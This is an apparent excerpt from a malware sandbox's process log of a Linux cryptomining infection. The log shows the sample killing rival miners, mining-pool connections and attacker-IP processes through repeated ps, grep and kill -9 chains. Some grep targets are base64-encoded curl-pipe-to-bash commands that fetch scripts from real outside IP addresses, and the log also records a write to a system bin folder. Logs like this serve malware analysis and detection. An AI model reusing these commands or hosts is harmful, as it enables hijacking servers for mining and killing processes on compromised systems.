PID:623

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:627

/bin/grep
grep HiPxCJRS
2⤵
PID:626

/bin/grep
grep -v grep
2⤵
PID:625

/bin/ps
ps aux
2⤵
PID:624

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:628

/bin/grep
grep http_0xCC030
2⤵
PID:631

/bin/grep
grep -v grep
2⤵
PID:630

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:629

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:632

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:633

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:637

/bin/grep
grep http_0xCC031
2⤵
PID:636

/bin/grep
grep -v grep
2⤵
PID:635

/bin/ps
ps aux
2⤵
PID:634

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:638

/bin/grep
grep -v grep
2⤵
PID:640

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:639

/bin/grep
grep http_0xCC032
2⤵
PID:641

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:643

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:642

/bin/grep
grep -v grep
2⤵
PID:645

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:648

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:647

/bin/grep
grep http_0xCC033
2⤵
PID:646

/bin/ps
ps aux
2⤵
PID:644

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:649

/bin/grep
grep -v grep
2⤵
PID:650

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:652

/bin/grep
grep C4iLM4L
2⤵
PID:651

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:653

/bin/grep
grep -v grep
2⤵
PID:655

/bin/ps
ps aux
2⤵
PID:654

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:657

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:658

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:656

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:662

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:661

/bin/grep
grep -v grep
2⤵
PID:660

/bin/ps
ps aux
2⤵
PID:659

/bin/grep
grep /boot/vmlinuz
2⤵
PID:665

/bin/grep
grep -v grep
2⤵
PID:664

/bin/ps
ps aux
2⤵
PID:663

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:667

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:666

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:671

/bin/grep
grep i4b503a52cc5
2⤵
PID:670

/bin/grep
grep -v grep
2⤵
PID:669

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:668

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:672

/bin/ps
ps aux
2⤵
PID:673

/bin/grep
grep -v grep
2⤵
PID:674

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:675

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:676

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:677

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:681

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:680

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:682

/bin/grep
grep -v grep
2⤵
PID:679

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:678

/bin/grep
grep -v grep
2⤵
PID:684

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:683

/bin/grep
grep nqscheduler
2⤵
PID:685

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:687

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:686

/bin/grep
grep -v grep
2⤵
PID:689

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:688

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:691

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:692

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:690

/bin/grep
grep -v aux
2⤵
PID:695

/bin/grep
grep -v grep
2⤵
PID:694

/bin/ps
ps aux
2⤵
PID:693

/bin/grep
grep "]"
2⤵
PID:696

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:697

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:698

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:701

/bin/grep
grep -v grep
2⤵
PID:700

/bin/ps
ps aux
2⤵
PID:699

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:702

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:703

/bin/grep
grep -v grep
2⤵
PID:705

/bin/grep
grep 0kwti6ut420t
2⤵
PID:706

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:707

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:704

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:708

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:712

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:711

/bin/grep
grep -v grep
2⤵
PID:710

/bin/ps
ps aux
2⤵
PID:709

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:713

/bin/grep
grep -v -
2⤵
PID:717

/bin/grep
grep -v /
2⤵
PID:716

/bin/grep
grep -v grep
2⤵
PID:715

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:714

/bin/grep
grep -v _
2⤵
PID:718

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:720

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:719

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:724

/bin/grep
grep "\\[^"
2⤵
PID:723

/bin/grep
grep -v grep
2⤵
PID:722

/bin/ps
ps aux
2⤵
PID:721

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:725

/bin/ps
ps aux
2⤵
PID:726

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:729

/bin/grep
grep rsync
2⤵
PID:728

/bin/grep
grep -v grep
2⤵
PID:727

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:730

/bin/grep
grep watchd0g
2⤵
PID:733

/bin/grep
grep -v grep
2⤵
PID:732

/bin/ps
ps aux
2⤵
PID:731

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:735

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:734

/bin/grep
grep -v grep
2⤵
PID:737

/bin/ps
ps aux
2⤵
PID:736

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:739

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:740

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
- Writes file to system bin folder
PID:738

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:738

/bin/grep
grep -v grep
2⤵
PID:742

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:743

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:744

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:745

/bin/ps
ps aux
2⤵
PID:741

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:749

/bin/grep
grep /tmp/java
2⤵
PID:748

/bin/grep
grep -v grep
2⤵
PID:747

/bin/ps
ps aux
2⤵
PID:746

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:750

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:754

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:755

/bin/grep
grep gitee.com
2⤵
PID:753

/bin/ps
ps aux
2⤵
PID:751

/bin/grep
grep -v grep
2⤵
PID:752

/bin/grep
grep -v grep
2⤵
PID:757

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:759

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:756

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:760

/bin/grep
grep /tmp/java
2⤵
PID:758

/bin/grep
grep 104.248.4.162
2⤵
PID:763

/bin/grep
grep -v grep
2⤵
PID:762

/bin/ps
ps aux
2⤵
PID:761

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:765

/bin/grep
grep 89.35.39.78
2⤵
PID:768

/bin/grep
grep -v grep
2⤵
PID:767

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:766

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:769

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:775

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:773

/bin/grep
grep -v grep
2⤵
PID:772

/bin/ps
ps aux
2⤵
PID:771

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:774

/bin/grep
grep kthrotlds
2⤵
PID:778

/bin/grep
grep -v grep
2⤵
PID:777

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:776

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:779

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:780

/bin/grep
grep ksoftirqds
2⤵
PID:783

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:784

/bin/grep
grep -v grep
2⤵
PID:782

/bin/ps
ps aux
2⤵
PID:781

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:785

/bin/grep
grep -v grep
2⤵
PID:787

/bin/grep
grep netdns
2⤵
PID:788

/bin/ps
ps aux
2⤵
PID:786

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:790

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:789

/bin/grep
grep -v grep
2⤵
PID:792

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:791

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:794

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:795

/bin/grep
grep watchdogs
2⤵
PID:793

/bin/grep
grep -v grep
2⤵
PID:797

/bin/ps
ps aux
2⤵
PID:796

/bin/grep
grep kdevtmpfsi
2⤵
PID:798

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:800

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:799

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:804

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:805

/bin/grep
grep kinsing
2⤵
PID:803

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:801

/bin/grep
grep -v grep
2⤵
PID:802

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:809

/bin/grep
grep redis2
2⤵
PID:808

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:810

/bin/ps
ps aux
2⤵
PID:806

/bin/grep
grep -v grep
2⤵
PID:807

/bin/grep
grep -v grep
2⤵
PID:812

/bin/grep
grep -v aux
2⤵
PID:813

/bin/ps
ps aux
2⤵
PID:811

/bin/grep
grep " ps"
2⤵
PID:814

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:815

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:816

/bin/grep
grep -v grep
2⤵
PID:818

/bin/ps
ps aux
2⤵
PID:817

/bin/grep
grep sync_supers
2⤵
PID:819

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:821

/usr/bin/cut
cut -c 9-15
2⤵
PID:820

/bin/grep
grep cpuset
2⤵
PID:824

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:826

/bin/grep
grep -v grep
2⤵
PID:823

/bin/ps
ps aux
2⤵
PID:822

/usr/bin/cut
cut -c 9-15
2⤵
PID:825

/bin/grep
grep "x]"
2⤵
PID:830

/bin/grep
grep -v aux
2⤵
PID:829

/bin/grep
grep -v grep
2⤵
PID:828

/bin/ps
ps aux
2⤵
PID:827

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:831

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:832

/bin/grep
grep -v grep
2⤵
PID:834

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:833

/bin/grep
grep -v aux
2⤵
PID:835

/bin/grep
grep "sh] <"
2⤵
PID:836

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:837

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:838

/bin/grep
grep -v aux
2⤵
PID:841

/bin/grep
grep -v grep
2⤵
PID:840

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:839

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:843

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:844

/bin/grep
grep " \\[]"
2⤵
PID:842

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:848

/bin/grep
grep /tmp/l.sh
2⤵
PID:847

/bin/ps
ps aux
2⤵
PID:845

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:849

/bin/grep
grep -v grep
2⤵
PID:846

/bin/grep
grep /tmp/zmcat
2⤵
PID:852

/bin/grep
grep -v grep
2⤵
PID:851

/bin/ps
ps aux
2⤵
PID:850

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:853

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:854

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:858

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:859

/bin/grep
grep hahwNEdB
2⤵
PID:857

/bin/grep
grep -v grep
2⤵
PID:856

/bin/ps
ps aux
2⤵
PID:855

/bin/grep
grep CnzFVPLF
2⤵
PID:862

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:863

/bin/grep
grep -v grep
2⤵
PID:861

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:860

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:864

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:868

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:869

/bin/grep
grep CvKzzZLs
2⤵
PID:867

/bin/grep
grep -v grep
2⤵
PID:866

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:865

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:872

/bin/grep
grep -v grep
2⤵
PID:871

/bin/ps
ps aux
2⤵
PID:870

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:873

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:874

/bin/grep
grep /tmp/udevd
2⤵
PID:877

/bin/grep
grep -v grep
2⤵
PID:876

/bin/ps
ps aux
2⤵
PID:875

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:878

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:879

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:883

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:882

/bin/grep
grep -v grep
2⤵
PID:881

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:880

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:884

/bin/grep
grep -v grep
2⤵
PID:886

/bin/ps
ps aux
2⤵
PID:885

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:888

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:889

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:887

/bin/grep
grep -v grep
2⤵
PID:891

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:893

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:890

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:894

/bin/grep
grep sustse
2⤵
PID:892

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:898

/bin/grep
grep sustse3
2⤵
PID:897

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:899

/bin/grep
grep -v grep
2⤵
PID:896

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:895

/bin/grep
grep -v grep
2⤵
PID:901

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:900

/bin/grep
grep wget
2⤵
PID:903

/bin/grep
grep mr.sh
2⤵
PID:902

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:904

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:905

/bin/grep
grep -v grep
2⤵
PID:907

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:906

/bin/grep
grep mr.sh
2⤵
PID:908

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:910

/bin/grep
grep curl
2⤵
PID:909

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:911

/bin/grep
grep wget
2⤵
PID:915

/bin/grep
grep 2mr.sh
2⤵
PID:914

/bin/grep
grep -v grep
2⤵
PID:913

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:912

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:917

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:916

/bin/grep
grep -v grep
2⤵
PID:919

/bin/ps
ps aux
2⤵
PID:918

/bin/grep
grep 2mr.sh
2⤵
PID:920

/bin/grep
grep curl
2⤵
PID:921

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:922

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:923

/bin/grep
grep cr5.sh
2⤵
PID:926

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:928

/bin/grep
grep -v grep
2⤵
PID:925

/bin/ps
ps aux
2⤵
PID:924

/bin/grep
grep wget
2⤵
PID:927

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:929

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:934

/bin/grep
grep curl
2⤵
PID:933

/bin/grep
grep cr5.sh
2⤵
PID:932

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:930

/bin/grep
grep -v grep
2⤵
PID:931

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:935

/bin/grep
grep wget
2⤵
PID:939

/bin/grep
grep logo9.jpg
2⤵
PID:938

/bin/grep
grep -v grep
2⤵
PID:937

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:936

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:940

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:941

/bin/grep
grep -v grep
2⤵
PID:943

/bin/grep
grep logo9.jpg
2⤵
PID:944

/bin/grep
grep curl
2⤵
PID:945

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:946

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:947

/bin/ps
ps aux
2⤵
PID:942

/bin/grep
grep -v grep
2⤵
PID:949

/bin/grep
grep j2.conf
2⤵
PID:950

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:948

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:951

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:952

/bin/grep
grep wget
2⤵
PID:956

/bin/grep
grep luk-cpu
2⤵
PID:955

/bin/grep
grep -v grep
2⤵
PID:954

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:953

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:957

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:958

/bin/grep
grep -v grep
2⤵
PID:960

/bin/grep
grep luk-cpu
2⤵
PID:961

/bin/grep
grep curl
2⤵
PID:962

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:963

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:959

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:964

/bin/grep
grep ficov
2⤵
PID:967

/bin/grep
grep -v grep
2⤵
PID:966

/bin/ps
ps aux
2⤵
PID:965

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:969

/bin/grep
grep wget
2⤵
PID:968

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:970

/bin/grep
grep ficov
2⤵
PID:973

/bin/grep
grep -v grep
2⤵
PID:972

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:971

/bin/grep
grep curl
2⤵
PID:974

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:975

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:976

/bin/grep
grep wget
2⤵
PID:980

/bin/grep
grep he.sh
2⤵
PID:979

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:981

/bin/grep
grep -v grep
2⤵
PID:978

/bin/ps
ps aux
2⤵
PID:977

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:982

/bin/grep
grep -v grep
2⤵
PID:984

/bin/ps
ps aux
2⤵
PID:983

/bin/grep
grep he.sh
2⤵
PID:985

/bin/grep
grep curl
2⤵
PID:986

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:987

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:988

/bin/grep
grep miner.sh
2⤵
PID:991

/bin/grep
grep -v grep
2⤵
PID:990

/bin/ps
ps aux
2⤵
PID:989

/bin/grep
grep wget
2⤵
PID:992

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:993

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:994

/bin/grep
grep curl
2⤵
PID:998

/bin/grep
grep miner.sh
2⤵
PID:997

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:999

/bin/ps
ps aux
2⤵
PID:995

/bin/grep
grep -v grep
2⤵
PID:996

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1000

/bin/grep
grep wget
2⤵
PID:1004

/bin/grep
grep nullcrew
2⤵
PID:1003

/bin/ps
ps aux
2⤵
PID:1001

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1005

/bin/grep
grep -v grep
2⤵
PID:1002

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1006

/bin/grep
grep curl
2⤵
PID:1010

/bin/grep
grep nullcrew
2⤵
PID:1009

/bin/grep
grep -v grep
2⤵
PID:1008

/bin/ps
ps aux
2⤵
PID:1007

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1012

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1011

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1016

/bin/grep
grep 107.174.47.156
2⤵
PID:1015

/bin/grep
grep -v grep
2⤵
PID:1014

/bin/ps
ps aux
2⤵
PID:1013

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1017

/bin/grep
grep 83.220.169.247
2⤵
PID:1020

/bin/grep
grep -v grep
2⤵
PID:1019

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1021

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1022

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1018

/bin/grep
grep -v grep
2⤵
PID:1024

/bin/grep
grep 51.38.203.146
2⤵
PID:1025

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1026

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1027

/bin/ps
ps aux
2⤵
PID:1023

/bin/grep
grep -v grep
2⤵
PID:1029

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1028

/bin/grep
grep 144.217.45.45
2⤵
PID:1030

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1031

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1032

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1036

/bin/grep
grep 107.174.47.181
2⤵
PID:1035

/bin/grep
grep -v grep
2⤵
PID:1034

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1033

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1037

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1041

/bin/grep
grep 176.31.6.16
2⤵
PID:1040

/bin/grep
grep -v grep
2⤵
PID:1039

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1038

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1042

/bin/grep
grep -v grep
2⤵
PID:1044

/bin/ps
ps auxf
2⤵
PID:1043

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1046

/bin/grep
grep mine.moneropool.com
2⤵
PID:1045

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1047

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1051

/bin/grep
grep pool.t00ls.ru
2⤵
PID:1050

/bin/grep
grep -v grep
2⤵
PID:1049

/bin/ps
ps auxf
2⤵
PID:1048

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1052

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1056

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:1055

/bin/grep
grep -v grep
2⤵
PID:1054

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1053

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1057

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1061

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:1060

/bin/grep
grep -v grep
2⤵
PID:1059

/bin/ps
ps auxf
2⤵
PID:1058

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1062

/bin/grep
grep -v grep
2⤵
PID:1064

/bin/ps
ps auxf
2⤵
PID:1063

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1066

/bin/grep
grep "[email protected]"
2⤵
PID:1065

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1067

/bin/grep
grep monerohash.com
2⤵
PID:1070

/bin/grep
grep -v grep
2⤵
PID:1069

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1071

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1072

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1068

/bin/grep
grep -v grep
2⤵
PID:1074

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1073

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:1075

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1076

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1077

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1081

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1082

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:1080

/bin/grep
grep -v grep
2⤵
PID:1079

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1078

/bin/grep
grep -v grep
2⤵
PID:1084

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:1085

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1087

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1086

/bin/ps
ps auxf
2⤵
PID:1083

/bin/grep
grep -v grep
2⤵
PID:1089

/bin/ps
ps auxf
2⤵
PID:1088

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:1090

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1091

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1092

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1096

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:1095

/bin/grep
grep -v grep
2⤵
PID:1094

/bin/ps
ps auxf
2⤵
PID:1093

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1097

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1101

/bin/grep
grep xmrpool.eu
2⤵
PID:1100

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1102

/bin/grep
grep -v grep
2⤵
PID:1099

/bin/ps
ps auxf
2⤵
PID:1098

/bin/grep
grep kieuanilam.me
2⤵
PID:1105

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1107

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1106

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1103

/bin/grep
grep -v grep
2⤵
PID:1104

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1110

/bin/grep
grep xiaoyao
2⤵
PID:1109

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1108

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1111

/usr/local/sbin/kill
kill -9 1109
3⤵
PID:1112

/usr/local/bin/kill
kill -9 1109
3⤵
PID:1112

/usr/sbin/kill
kill -9 1109
3⤵
PID:1112

